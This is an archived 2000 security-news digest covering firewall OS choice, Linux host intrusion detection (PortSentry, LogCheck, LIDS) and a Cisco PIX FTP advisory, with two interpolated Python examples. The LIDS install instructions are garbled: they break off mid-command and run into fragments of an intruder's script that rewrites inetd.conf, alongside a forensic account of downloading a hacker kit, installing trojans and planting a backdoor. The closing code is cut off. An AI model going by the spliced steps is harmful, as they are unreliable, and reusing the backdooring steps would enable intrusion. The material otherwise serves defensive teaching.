Also, keep in mind that because I may have decided that your favorite OS may not have been best for me, it is not an insult to you. Don't view OS's as a religion, because they are only tools. Nothing more. Use the best one for a given job and let it stay at that. Commercial Firewalls vs. Open Source Firewalls The first bridge that we had to cross was getting people to accept an open source firewall package. Everyone knows and trusts products like Checkpoint and Cisco's Pix firewall. A firewall is a key part of the security infrastructure. It is a stretch to ask management to trust a product, they may have never heard of, for such an important part of the network. When you buy a commercial firewall product, you are not buying a better quality product, but only paying for a name. That name gives your management and you confidence that there is a strong, solid company behind your firewall. With an open source firewall, you do not get that name. However, you do get the equivalent credibility through the very nature of open source. Anyone that uses it will be more than happy to tell you the good and the bad that they have gone through with the product. The other bonus is that open source firewalls are usually written by people that are using the product themselves. This gives them every incentive in the world of making it work right. Plus, with the open source model you can influence the direction of the program. Darren Reed of IP Filter has impressed me many times over with his openness to add features that users have asked for. You do not find that with a bigger commercial company. Our Firewall product I am a BSD guy. That is the platform I know best. With that in mind, there are two popular free firewalls we could pick from: IP Filter and IP Firewall. IP Firewall is a fine product that I have used in the past with success, but at the time it could not keep state. 
A stateful firewall was a requirement for this particular project, so we decided to go with IP Filter (http://coombs.anu.edu.au/~avalon/). There is a bit of a religious war about stateful vs. non-stateful (packet filter) firewalls. Don't take my word for which is better. Look through the book referenced above to see which would work best for you. I prefer to stay with a stateful firewall, because it allows me to only allow the initial Syn packet through. Then the firewall will allow the rest of that TCP session through. This prevents things like stealth scans from getting through your network. IP Filter is a nice, small, and efficient firewall that comes with the base OS of FreeBSD, OpenBSD, and NetBSD. It also runs on Solaris, SunOS, BSD/OS, Irix, and HP/UX. The cross platform nature of the product was a big feather in its cap. It would allow us to go with one Unix today, switch to a different Unix in the future, and still keep the same firewall product. The next question was: What platform are we going to run this product on? Base OS As previously stated, I am a BSD guy. So we came right out looking at FreeBSD and OpenBSD. Since this was a smaller installation, I was looking forward to using an OS which I was not as familiar with. I am more familiar with FreeBSD, which was a strike against it and gave OpenBSD a leg up. The other big issue supporting OpenBSD is the way it is marketed. If you go to http://www.openbsd.org they will be more than happy to tell you that they have "Three years without a remote hole in the default install!" and "Two years without a localhost hole in the default install!". That is very impressive. You do not go that long without a root exploit by luck. This shows a focus by the OpenBSD developers to make the default install of OpenBSD secure. Plus, IP Filter is the default firewall with OpenBSD so it makes getting up and running with OpenBSD very quick. 
With the hard core security that drives the OpenBSD project along with the chance to work with something new in mind, we decided that OpenBSD would be a good choice for a BSD-based IP Filter firewall. Implementation This is where the fun really is, in setting up the firewall itself. After the install of OpenBSD, all you have to do is enable IP Filter and plug in your rule set. The best source of information for setting up IP Filter is in the OpenBSD FAQ at http://www.openbsd.org/faq/faq6.html. Follow those instructions and you should be up and going in no time. The only real thing you should watch is when you write your rule sets. You really have to understand IP. Otherwise you are very likely to open up a hole in the network. Testing After the firewall is installed and the rules are written, the most important thing is testing. You cannot setup a firewall, throw it on the network and assume it works. Testing the NAT (Network Address Translation) is very easy. Simply plug a machine on the internal interface and see if it works. SSH into a box on a remote network, do a "who" and see what IP it says you are coming from. Really, NAT is kind of nice in the regard that it either works or does not. The firewall, however, is a different story. There is really no right way of testing it. What we did was go through the rule set and double check all the rules. After that, from a remote network we ran Nessus (http://www.nessus.org/), Nmap (http://www.insecure.org/nmap/index.html) and Saint (http://www.wwdsi.com/saint/) against our public IP range. You may have some different preferred tools to use for this purpose. The key is to be creative. Try what you would do if you were trying to break into that network. Use the tools that crackers trying to break in would use. After you have things looking good, you must remember to test every couple of months. No firewall is ever done. As new attacks come out, you must make sure you are defended against them. 
Results and Changes

What we found was that the initial install went fine. The firewall was secure, the NAT worked great, and everyone was happy. Then the time came when we wanted to upgrade IP Filter to the newest version. That is when we ran into a bit of trouble.

Upgrading was important to us because we wanted to have access to IP Filter's newest features and bug fixes. After some searching around, we ran into e-mails such as this one: http://www.false.net/ipfilter/2000_02/0004.html. The short of them is that it is not suggested practice to install IP Filter from source on OpenBSD, and it is doubtful it would even work. Instead, what users are supposed to do is upgrade OpenBSD to -current, where the maintainer of the IP Filter section should have the newest version integrated into the source tree.

This was an issue for us. Running -current on any type of production server, much less something as key as a firewall, is not something that should be done. For those not familiar with the way BSDs work, -current is the up-to-when-you-cvsup current snapshot of the source tree of the OS. There is no guarantee that it will work, be bug free or even compile. -current is a work in progress for developers to use, and not intended for production use.

So, in order to upgrade IP Filter on OpenBSD on our production firewalls we were left with two choices: either run not-yet-ready-for-production code or not upgrade at all. Because of the chances of a problem with IP Filter coming out in the future, we decided to change to FreeBSD. FreeBSD would allow us to track -stable (a branch of the source tree meant for production use), and allow us to upgrade IP Filter from source whenever we felt like it.

The Change

Once you break down what you actually do on a firewall that is maintained by someone that understands firewalls, many of OpenBSD's strengths don't matter. Let's give a couple of "for instances" to make sure that my point is being made clear.
A home user, who may not understand Unix well, may best be served by running OpenBSD as a firewall platform. The reason for this is that the home user can do a default OpenBSD install and feel good in the fact that even if he does not know enough to turn off services, he will be at least a little protected by the fact there has been no root exploits for quite some time. True, a box is only as secure as the administrator makes it, but this type of user is not likely to change much of anything. In which case, the secure-by-default install will help them. Plus, a user like this is not likely to want to upgrade their install until the next version upgrade comes out, so the inflexibility of IP Filter on OpenBSD should not hurt them. For a use like ours, however, where the administrator will go over the box and shutdown the services they will never need, and no user logs in on the firewall, there is not much that OpenBSD will give you. OpenBSD and FreeBSD both running IP Filter, with SSH as the only other service, will be equally secure. If there are no other remote services running, there is no other way into the box. With no loss in security while gaining the flexibility of being able to upgrade IP Filter whenever needed, there was no reason not to use FreeBSD. With those facts in mind, we made the switch of OpenBSD to FreeBSD. Justification The upgrade was very simple. Install FreeBSD, install the newest IP Filter, copy over the rule sets, and we were done. With the rule set already written, there is really not much else to do. Shortly after we finished the upgrade, we felt justified for our decision. In this e-mail, http://false.net/ipfilter/2000_05/0091.html, an IP Filter user had found a bug that may have been used to exploit an IP Filter install. If this exploit had been developed then there would have been a hole in our firewall. 
If we had still been on OpenBSD, we would have had to choose between running -current or sticking with the old, buggy, version of IP Filter. The Future The lesson learned here is that you cannot listen to marketing, even open source marketing. Even though OpenBSD is known as "the secure OS," and a firewall is an application where you would want the utmost security, the product marketed towards that niche may not be the best choice for the application. The best thing to do is ignore the marketing, look at all the facts, and decide what is best for your install. Hopefully in the future, there will be an easier way to upgrade IP Filter under OpenBSD. Even if they make one, I do not see any reason for us to switch back. Switching back would gain us nothing. We will see what the future brings and the direction of both BSD projects and IP Filter change that might affect the way we do things. An important thing about computers in general is nothing is static, as new products come out and existing products change, you have to go with what is best at the time. More Info IP Filter - http://coombs.anu.edu.au/~avalon/ IPF(8) Manual Page from FreeBSD - http://www.bsdtoday.com/2000/May/supplement166.html inetd and inetd.conf: Managing your system's internet switchboard operator - http://www.bsdtoday.com/2000/March/Tutorials19.html @HWA 201.0 [HNS] May 24:LAPTOPS STOLEN FROM PARLIAMENT ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by LogError Wednesday 24 May 2000 on 1:09 AM Five laptop computers worth about $30,000 have been stolen from Parliament House in what appears to have been an inside job. The laptops could allow access to the parliamentary network, a Senate committee heard today. Link: Australian IT http://australianit.com.au/common/storyPage/0,3811,715221%255E442,00.html Laptops stolen from Parliament AAP FIVE laptop computers worth about $30,000 have been stolen from Parliament House in what appears to have been an inside job. 
The laptops could allow hackers access to the parliamentary network, a Senate committee heard today. They were taken over a short period of time from secured areas at parliament.

Parliamentary official Robert Alison said the laptops appeared to have been taken by parliamentary workers or visitors with security clearance.

"It seems strange to me that four or five computers would disappear in a short time, which says to me that there may be a market for them," Mr Alison said.

"One of the concerns is that all five of those computers were taken from what we call the private areas of Parliament House, so presumably the person or persons who took them was a passholder of some sort."

Mr Alison, the Usher of the Black Rod, said the laptops were protected by passwords but acknowledged their contents were not 100 per cent safe.

@HWA

202.0 [HNS] May 24: MICROSOFT PROGRAMS VULNERABLE TO VIRUSES
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by LogError
Wednesday 24 May 2000 on 12:58 AM

More than 45,000 viruses infect PCs running the Windows operating system worldwide. By contrast, perhaps 35 viruses have been written for the Macintosh and four or five for the Unix-based computers that run most Web sites, says Eugene Spafford, director of the Center for Education and Research in Information Assurance and Security lab at Purdue University.

Link: USA Today
http://www.usatoday.com/life/cyber/tech/cth950.htm

@HWA

203.0 [HNS] May 24:INTRUSION DETECTION ON LINUX
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by LogError
Wednesday 24 May 2000 on 12:54 AM

"This article focuses on several host-based intrusion detection systems that are available on Linux. In particular, I will cover some of the basics of installing setting up these packages, how they are useful, and in what circumstances they can be used. This article assumes a basic knowledge of systems security.
In particular, I will assume that the most basic security measures have already been taken to secure a host against intrusion from the internet."

Link: Security Focus
http://www.securityfocus.com/focus/linux/articles/linux-ids.html

Typical newbie fare, graphic missing from this text version, use link to ogle the chart. - Ed

Focus On Linux: Intrusion Detection on Linux
by David "Del" Elson
last updated Monday, May 22, 2000

Introduction

This article focuses on several host-based intrusion detection systems that are available on Linux. In particular, I will cover some of the basics of installing setting up these packages, how they are useful, and in what circumstances they can be used.

Systems Security 101

This article assumes a basic knowledge of systems security. In particular, I will assume that the most basic security measures have already been taken to secure a host against intrusion from the internet. These measures could include:

Firewalling, to ensure that access to the various TCP and UDP ports of the system that were not intended for internet access are prevented.
For example, a basic set of firewalling rules for a web server would ensure that the only TCP/IP access to the machine was on TCP port 80, the port normally used for HTTP access. Disabling daemons that are not required. For example: A web server normally needs a process running to serve web pages. Processes that are not associated with serving web pages, such as RPC/Portmap services, NFS services, X Font Server, DNS name server, and other extraneous and unused applications should be stopped or disabled. On a Red Hat Linux system, this is normally done by using one of the run level editors, for example ntsysv or tksysv, to disable the startup of any daemon or service that is not required. Disabling access to ports that are not required, by editing /etc/inetd.conf. Typically, a system will come pre-installed with access to many ports enabled in the /etc/inetd.conf file. Editing this file to remove or comment out any lines that are not required is the most basic system security activity and should be carried out on all systems. Lines of Defence Illustration 1: Multi Layered Systems Security In this article, I will discuss a multi-layered approach to systems security. Several security layers can be used independently to provide additional protection in case any of the layers should be breached. An example of a multi-layered security system is shown in illustration 1. Each layer in the diagram provides additional data protection to the layers above it. For example, the first layer is the firewall. Should an intrusion attempt not be defeated by the firewall, a second layer, the Port Sentry program, can provide additional protection. Further inside the security system are the LIDS and LogCheck programs, that provide additional protection should an intrusion attempt not be intercepted by the Port Sentry program. 
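The /etc/inetd.conf review described under Systems Security 101 above can be checked mechanically. The following Python is an added example, not code from the article: the function names, the sample file and the choice of required services are constructed for illustration. It lists the entries that are still enabled and comments out the ones that are not required.

```python
"""Audit inetd.conf for services that are still enabled (added example)."""
from typing import List, NamedTuple, Optional, Set


class Service(NamedTuple):
    name: str      # service name as listed in /etc/services
    proto: str     # tcp, udp, rpc/udp, ...
    user: str      # account the server is started as
    server: str    # server program, or "internal"


def parse_line(line: str) -> Optional[Service]:
    """Return the Service an inetd.conf line enables, or None."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return None                      # blank, or already commented out
    fields = stripped.split()
    if len(fields) < 6:
        return None                      # not a complete service entry
    name, _socktype, proto, _wait, user, server = fields[:6]
    # The user field may carry a group as user.group; keep the user part.
    return Service(name, proto, user.split(".")[0], server)


def enabled_services(conf_text: str) -> List[Service]:
    """Every entry inetd would actually start from this configuration."""
    return [s for s in map(parse_line, conf_text.splitlines()) if s]


def harden(conf_text: str, required: Set[str]) -> str:
    """Comment out every enabled entry whose service is not required."""
    out = []
    for line in conf_text.splitlines():
        svc = parse_line(line)
        if svc and svc.name not in required:
            line = "#" + line
        out.append(line)
    return "\n".join(out) + "\n"


# Constructed sample in the style of a stock inetd.conf; not from the article.
SAMPLE_CONF = """\
# <service> <sock_type> <proto> <flags> <user> <server_path> <args>
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
#shell  stream  tcp     nowait  root    /usr/sbin/tcpd  in.rshd
imap    stream  tcp     nowait  root    /usr/sbin/tcpd  imapd
finger  stream  tcp     nowait  nobody  /usr/sbin/tcpd  in.fingerd
time    dgram   udp     wait    root    internal
"""

if __name__ == "__main__":
    required: Set[str] = set()   # assumption: a web server needing nothing from inetd
    for svc in enabled_services(SAMPLE_CONF):
        action = "KEEP" if svc.name in required else "DISABLE"
        print(f"{action:8}{svc.name:8}{svc.proto:5}runs as {svc.user}")
    print(harden(SAMPLE_CONF, required), end="")
```

inetd re-reads its configuration on SIGHUP, so an edited file takes effect only after the daemon is signalled or restarted.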
Monitoring Incoming Connections The first layer of protection behind the firewall is a software package that will monitor incoming attempts to connect to the machine. The PortSentry package (http://www.psionic.com/abacus/portsentry/) provides a simple and effective method of doing this. What does PortSentry do? PortSentry is a program that monitors activity on specific TCP/IP ports. Activity on the ports that are monitored by PortSentry is reported, and one of several options can be taken, including denying further attempts to access to your system from the source of the activity. This is an important defence mechanism, because a hacker will typically probe your system for weaknesses ("port scanning") before attempting an intrusion. Detecting the probe or port scan, and completely denying further access to your system by a potential hacker, robs that hacker of the ability to follow up on any port scans with a real intrusion attempt. Installing PortSentry For users of Red Hat Linux, PortSentry is available in RPM format on the Red Hat contrib FTP site. This site is mirrored in various locations around the world, check at www.redhat.com for the location of your nearest mirror. I haven't yet determined the availability of a .deb format package for PortSentry but I am sure there is one out there. For other Linux systems, installing PortSentry from the source code is relatively simple. Recommended Configuration PortSentry runs in a number of modes, including various TCP and UDP stealth modes. The mechanism that I prefer to use for running PortSentry is to bind it to a TCP port that (a) is not in use, and (b) is known in some systems to have potential for intrusion attempts. For example, port 143 (imap2), port 111 (portmap) and port 23 (telnet) are TCP ports that I do not use on my internet systems, and my web server was scanned on both of those ports in the last 24 hours. 
To start PortSentry in basic TCP mode, ensure that your system start-up scripts run this command somewhere: portsentry -tcp Also, ensure that the PortSentry config file (portsentry.conf) contains a TCP_PORTS line enabling scanning on the ports that you require. Response Options The "Response Options" section of the portsentry.conf file allows you to specify what response that PortSentry will take on detecting unwanted activity. The mechanism that I normally choose is to use ipchains to block further access from the source of the activity. This is done by uncommenting the following line in the portsentry.conf file: KILL_ROUTE="/sbin/ipchains -I input -s $TARGET$ -j DENY -l" On systems that receive a high level of port scanning activity, removing the "-l" at the end of the above line will prevent logging of further incoming connections, which might be useful to save space in the log files. Monitoring System Logs Firewalling systems, and software like PortSentry perform one useful function, in that they monitor and prevent connections coming in to unwanted ports on the system. This can prevent access to a system via a standard scan-and-intrude method. Where a system is required to run a particular service (eg: Apache on a web server, or BIND on a DNS server), and a hacker has uncovered a particular loophole in the service, these programs will unfortunately not achieve the result of keeping all intruders out of the system. A system acting as a DNS server that has a vulnerable copy of BIND running on it will eventually be discovered by a hacker that scans a wide range of machines for a single port (the DNS port) on each machine, and attempts intrusion against that port only. The firewall and PortSentry will unfortunately see this intrusion attempt as a legitimate access to the system. LogCheck LogCheck (http://www.psionic.com/abacus/logcheck/) is a useful program for scanning system logs for unusual activity. 
LogCheck works by scanning the various system log files (under Linux these are located in /var/log), and notifying the system administrator by e-mail if there is any unusual activity. Unusual messages in the log files can often be generated by intrusion attempts, or actual intrusions against your system.

Installing LogCheck

LogCheck is available in RPM format from the Red Hat contrib archives, and from the same sources as PortSentry. Installing LogCheck from the RPM file or from the source code (read the INSTALL file provided with the source code) is relatively simple.

Configuring LogCheck

LogCheck has four main configuration files. In the RPM version, these are stored in the /etc/logcheck directory. Normally, only the logcheck.ignore and the logcheck.violations.ignore files need modification. The normal process that I go through after installing LogCheck is as follows:

* Allow LogCheck to run once with the standard configuration files. This will produce a large output file, which can be thrown away.
* 24 hours later, allow LogCheck to run again. This will detect any new entries in the log files since the last run, and will produce a smaller but still sizeable output file. Read this file carefully.
* For entries in the file that are of no great concern (use your judgement for this) find a specific identifying string in the entry. For entries that are in the "Security Violations" section, add the identifying string to the logcheck.violations.ignore file. For other entries (in the "Unusual System Events" section), add the string to the logcheck.ignore file.
* Repeat this process, once every 12 - 24 hours for approximately a week. By this stage, enough "bogus" entries will be filtered out by the strings that you have added to the .ignore files that the daily LogCheck report will contain only genuine system concerns.

Note that the RPM file specifies that LogCheck is to be run hourly, but normally I only run it daily except on critical systems that need regular monitoring.
This is done by moving the /etc/cron.hourly/logcheck file into /etc/cron.daily.

Kernel Based Intrusion Detection

Kernel based intrusion detection is a relatively new art form for Linux. The main kernel based intrusion detection system currently available is called LIDS, and is available from http://www.lids.org/.

What is LIDS?

LIDS is an intrusion detection and prevention system that resides within the Linux kernel. LIDS' protection is aimed at preventing the root user (who would normally have access to the entire system) from tampering with important parts of the system. LIDS' most important features include increased file system protection, protection against direct port access or direct memory access, protection against raw disk access, and protection of log files. LIDS also prevents certain system actions, such as installing a packet sniffer or changing firewall rules.

LIDS Documentation

The LIDS system is somewhat more complex to install than either PortSentry or LogCheck. Fortunately, the LIDS web site contains quite good documentation on the LIDS project, including installation and configuration instructions.

Installing LIDS

First, before installing LIDS, make sure that you have the most up to date LIDS patch (I am using 0.9), and the correct kernel version. I am using the updated kernel (2.2.14-12) from the Red Hat Updates FTP site, because this contains some security fixes. You also need the source code for the kernel that you are using.

LIDS is currently targeted towards the 2.2.14 kernels. I installed LIDS on a Red Hat 6.2 system, which includes the 2.2.14 kernel. Before I installed LIDS, I obtained the updated kernel (from ftp.redhat.com/updates/ or one of its mirrors) and installed it according to the instructions at http://www.redhat.com/support/docs/howto/kernel-upgrade/kernel-upgrade.html.
The next thing I obtained was the updated kernel source, which also came from ftp.redhat.com/updates/ This I installed using: rpm -Uhv kernel-source-2.2.14-12.i386.rpm Next, compile and install the lidsadm program: cd /usr/local/src/security/lids-0.9/lidsadm-0.9 make make install Generate a RipeMD-160 password that will later be installed into the kernel: lidsadm -P I entered the password "anypass" and got back the key "d502d92bfead11d1ef17887c9db07a78108859e8". Next, I copied the standard Red Hat configuration file for my architecture into the /usr/src/linux directory: cd /usr/src/linux/configs/ cp kernel-2.2.12-i686.config .. Next, I installed the LIDS patch using the following commands: cd /usr/src patch -p0 > /tmp/b mv /tmp/b /etc/inetd.conf killall -HUP inetd Reading through this file, we can note the following activity: A directory with an unusual name (/usr/lib/...) was created on the system. An FTP connection was made back to the hacker's personal machine (200.192.58.201, traced to a dial-in address somewhere in Brazil), and a simple hacker-kit was downloaded. The hacker kit was uncompressed. It contained trojan binaries which were then installed on the system. The trojan binaries were used to over-write the system versions of netstat, ps, tcpd, syslogd, and pstree. These are programs that get used to report on system activity, show running processes, show open ports, etc. A backdoor process of some kind (/usr/lib/pt07) was installed and started. Note that since the hacker has installed his or her own versions of ps, pstree, and netstat, this trojan is probably invisible to the system. What Can We Learn From This? Firstly, note that LIDS would not have prevented the actual break-in. The hacker obtained root access to the machine by connecting to and overflowing a buffer in a process that was running as root. 
Once the hacker had broken in, we can note how LIDS would have minimised the damage: LIDS, by using the CAP_LINUX_IMMUTABLE option, would have prevented the trojan binaries from being written to /bin, /usr/bin, /usr/sbin, and /usr/lib. These are directories that we would normally mark as immutable (chattr +i) and hence could not have been changed. Note that even without LIDS we can mark these directories as immutable using chattr +i, but LIDS prevents even the root user from tampering with the immutable flag. Similarly, the touch -t commands would have failed if the files were marked chattr +i. Even the very first line of the script, "mkdir /usr/lib/..." would have failed if the /usr/lib directory was marked immutable! Note that LIDS would not have prevented the break-in, but would have prevented the hacker from causing any significant system damage after the break-in. A backdoor process could have been installed (eg: the pt07 backdoor could have been placed in /tmp, or any other non-immutable directory), but the non-trojan versions of ps, netstat, and pstree would have detected this process fairly easily and we could have come back and killed it off. Without LIDS being installed we have no other real clues as to what the hacker might have done via this backdoor, and so our only available method to clean up the hacker's damage is to re-install the system completely. OpenWall and LIDS: An Extra Layer Another similar system to LIDS is the OpenWall project (http://www.openwall.com/linux/). The OpenWall project contains some different security features to LIDS, and one of the OpenWall patches in particular makes the stack area non-executable. An excerpt from the OpenWall README file states: Most buffer overflow exploits are based on overwriting a function's return address on the stack to point to some arbitrary code, which is also put onto the stack. If the stack area is non-executable, buffer overflow vulnerabilities become harder to exploit. 
Another way to exploit a buffer overflow is to point the return address to a function in libc, usually system(). This patch also changes the default address that shared libraries are mmap()'ed at to make it always contain a zero byte. This makes it impossible to specify any more data (parameters to the function, or more copies of the return address when filling with a pattern), -- in many exploits that have to do with ASCIIZ strings. Recently, the LIDS web site has contained some integrated LIDS + OpenWall kernel patches that apply the security features of both LIDS and OpenWall to the kernel in a single integrated patch set. Conclusions Using a set of layered security tools on the Linux system, it is possible to prevent a wide range of system attacks, and to protect your system against intrusion or tampering. A hacker's point of entry into your system will be the network interfaces, and protecting these, and under the network interfaces, the system kernel, can discourage many attacks and prevent others. Be aware of any potential security holes in your system. Any daemon or service running on your system, either as root or as a non-root user, can be a potential security threat. Be prepared to face attacks against these threats. @HWA 204.0 [HNS] May 24:CRACKED! PART 3: HUNTING THE HUNTER ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by LogError Wednesday 24 May 2000 on 12:51 AM Noel continues the story of when some Unix boxes that he helped admin were cracked. This article talks about some of the efforts made to track down the cracker and some surprises. 
Link: RootPrompt.org
http://rootprompt.org/article.php3?article

Url is b0rked

You have an error in your SQL syntax near ';' at line 1
Warning: 0 is not a MySQL result index in /usr/www/users/noeld/article.php3 on line 53

@HWA

205.0 [HNS] May 24: THE NEXT GENERATION OF ILOVEYOU:THE PORN WORM
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by LogError
Wednesday 24 May 2000 on 12:45 AM

Erik Green writes "I've been sent a new semi-benign ILOVEYOU variant - it's got a subject line of "Check this" and consists of a one-line message and an attachment named LINKS.VBS. Its only purpose other than self replication is to add a link to a XXX site to your desktop...

Link: Slashdot
http://slashdot.org/article.pl?sid

@HWA

206.0 [HNS] May 23:PAPERS SENT TO PROSECUTORS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by BHZ
Tuesday 23 May 2000 on 4:27 PM

Japan had a first case in which papers have been sent to prosecutors on a minor suspected of "hacking" (article writes about hacking, but it looks it was just password stealing) since a law banning illegal computer access went into effect in February.

Link: Daily Yomiuri
http://www.yomiuri.co.jp/newse/0523cr11.htm

@HWA

207.0 [HNS] May 23:INFOEXPRESS AND NETWORK UTIL. AGREEMENT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by BHZ
Tuesday 23 May 2000 on 4:14 PM

InfoExpress, Inc., today announced an exclusive distribution agreement with U.K.-based Network Utilities (Systems) Ltd., a leading distributor of best-in-class enterprise security. The agreement names Network Utilities the sole provider of InfoExpress' marketing and technical support in the U.K. market.
Link: Press release http://www.net-security.org/cgi-bin/press/fullnews.cgi?newsid959090959,5116, @HWA 208.0 [HNS] May 23:FREE EXPORT OF ENCRYPTION SOFTWARE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Tuesday 23 May 2000 on 3:13 AM The European ministers of Foreign Affairs are expected to decide monday to lift all barriers to the export of encryption software to countries outside the European Union. Link: Heise http://www.heise.de/tp/english/inhalt/te/8179/1.html @HWA 209.0 [HNS] May 23:NAI GAUNTLET FIREWALL VULNERABILITY ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Tuesday 23 May 2000 on 3:05 AM According to Security Focus a firewall package protecting thousands of networks worldwide contains a bug that would allow attackers to obtain "root" access remotely. Link: Security Focus http://www.securityfocus.com/news/40 @HWA 210.0 [HNS] May 22: CISCO SECURE PIX FIREWALL PROBLEMS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Monday 22 May 2000 on 10:07 PM The Cisco Secure PIX Firewall interprets FTP (File Transfer Protocol) commands out of context and inappropriately opens temporary access through the firewall. Link: Cisco http://www.cisco.com/warp/public/707/pixftp-pub.shtml Cisco Secure PIX Firewall FTP Vulnerabilities Revision 1.6 For public release 2000 March 16 05:00 PM US/Pacific (UTC+0800) Summary The Cisco Secure PIX Firewall interprets FTP (File Transfer Protocol) commands out of context and inappropriately opens temporary access through the firewall. This is an interim notice describing two related vulnerabilities. The first vulnerability is exercised when the firewall receives an error message from an internal FTP server containing an encapsulated command such that the firewall interprets it as a distinct command. This vulnerability can be exploited to open a separate connection through the firewall. This vulnerability is documented as Cisco Bug ID CSCdp86352. 
The second vulnerability is exercised when a client inside the firewall browses to an external server and selects a link that the firewall interprets as two or more FTP commands. The client begins an FTP connection as expected and at the same time unexpectedly executes another command opening a separate connection through the firewall. This vulnerability is documented as Cisco Bug ID CSCdr09226.

Either vulnerability can be exploited to transmit information through the firewall without authorization.

Both vulnerabilities are addressed more completely in this updated interim security advisory.

Who Is Affected

All users of Cisco Secure PIX Firewalls with software versions up to and including 4.2(5), 4.4(4), and 5.0(3) that provide access to FTP services are at risk from both vulnerabilities.

Cisco Secure PIX Firewall with software version 5.1(1) is affected by the second vulnerability only.

Cisco Secure Integrated Software (formerly Cisco IOS® Software Firewall Feature Set) is not affected by either vulnerability.

Impact

Any Cisco Secure PIX Firewall that has enabled the fixup protocol ftp command is at risk of unauthorized transmission of data through the firewall.

Details

The first vulnerability has been assigned Cisco bug ID CSCdp86352. The second vulnerability has been assigned Cisco bug ID CSCdr09226.

The behavior is due to the command fixup protocol ftp [portnum], which is enabled by default on the Cisco Secure PIX Firewall.

If you do not have protected FTP hosts with the accompanying configuration (configuration example below) you are not vulnerable to the attack which causes a server to send a valid command, encapsulated within an error message, and causes the firewall to read the encapsulated partial command as a valid command (CSCdp86352).

To exploit this vulnerability, attackers must be able to make connections to an FTP server protected by the PIX Firewall.
If your Cisco Secure PIX Firewall has configuration lines similar to the following:

    fixup protocol ftp 21

and either

    conduit permit tcp host 192.168.0.1 eq 21 any

or

    conduit permit tcp 192.168.0.1 255.255.255.0 eq 21 any

It is possible to fool the PIX stateful inspection into opening up arbitrary TCP ports, which could allow attackers to circumvent defined security policies.

If you permit internal clients to make arbitrary FTP connections outbound, you may be vulnerable to the second vulnerability (CSCdr09226). This is an attack based on CERT advisory CA-2000-02: Malicious HTML Tags Embedded in Client Web Requests
http://www.cert.org/advisories/CA-2000-02.html
and detailed in the BUGTRAQ post: "Extending the FTP 'ALG' vulnerability to any FTP client"
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-08&msg=38C8C8EE.544524B1@enternet.se

The recommendation in the workarounds section of this document will provide protection against this vulnerability.

Response for the first vulnerability (CSCdp86352)

The following changes have been made to the "fixup protocol FTP" behavior of the PIX Firewall:

  * Enforce that only the server can generate a reply indicating the PASV command was accepted.
  * Enforce that only the client can generate a PORT command.
  * Enforce that data channel is initiated from the expected side in an FTP transaction.
  * Verify that the "227" reply code and the PORT command are complete commands and not part of a "500" error code string broken into fragments.
  * Enforce that the port is not 0 or in the range between [1,1024]

These or equivalent changes will be carried forward into all PIX Firewall software versions after version 5.1(1).
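The checks listed above, written out as an added Python example of a control-channel inspector (this is not Cisco's code and not part of the advisory). The class and function names are hypothetical, and the addresses and FTP segments fed to it are constructed sample data.

```python
import re

# h1,h2,h3,h4,p1,p2 tuple used by PORT arguments and 227 replies (RFC 959).
HOSTPORT = re.compile(r"(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})")


def parse_hostport(text, whole=False):
    """Return (ip, port) or None. whole=True requires text to be only the tuple."""
    m = HOSTPORT.fullmatch(text.strip()) if whole else HOSTPORT.search(text)
    if not m:
        return None
    nums = [int(g) for g in m.groups()]
    if any(n > 255 for n in nums):
        return None
    return ".".join(map(str, nums[:4])), nums[4] * 256 + nums[5]


class FtpControlInspector:
    """Hypothetical inspector for one FTP control connection.

    pinholes holds (expected_initiator, ip, port) for each data channel it
    would allow; rejected holds (reason, line) for everything it refused.
    """

    def __init__(self):
        self.buf = {"client": b"", "server": b""}
        self.pinholes = []
        self.rejected = []

    def feed(self, sender, segment):
        # Reassemble CRLF-terminated lines per direction, so a TCP segment
        # that merely *starts* with "227 " or "PORT " is never parsed alone.
        self.buf[sender] += segment
        while b"\r\n" in self.buf[sender]:
            raw, self.buf[sender] = self.buf[sender].split(b"\r\n", 1)
            self._inspect_line(sender, raw.decode("ascii", "replace"))

    def _inspect_line(self, sender, line):
        verb = line.split(" ", 1)[0].upper()
        if verb == "PORT":
            if sender != "client":          # only the client may send PORT
                return self._reject("PORT from server side", line)
            # Active mode: the server is the side expected to connect.
            self._open("server", parse_hostport(line[5:], whole=True), line)
        elif verb == "227":
            if sender != "server":          # only the server may accept PASV
                return self._reject("227 from client side", line)
            # Passive mode: the client is the side expected to connect.
            self._open("client", parse_hostport(line[4:]), line)
        elif HOSTPORT.search(line):
            # e.g. a 500 error reply that echoes an address tuple back
            self._reject("address tuple inside a non-PORT/227 line", line)

    def _open(self, initiator, target, line):
        if target is None:
            return self._reject("malformed address", line)
        ip, port = target
        if port <= 1024:                    # port 0 or in [1,1024]
            return self._reject("port 0 or in [1,1024]", line)
        self.pinholes.append((initiator, ip, port))

    def _reject(self, reason, line):
        self.rejected.append((reason, line))


def demo():
    """Feed constructed control-channel traffic; return the inspector."""
    insp = FtpControlInspector()
    insp.feed("client", b"PORT 192,168,0,10,195,80\r\n")            # legitimate
    insp.feed("server", b"227 Entering Passive Mode (192,168,0,1,")  # legitimate,
    insp.feed("server", b"195,81)\r\n")                              # split in two
    insp.feed("server", b"500 'XXXX")                                # error reply
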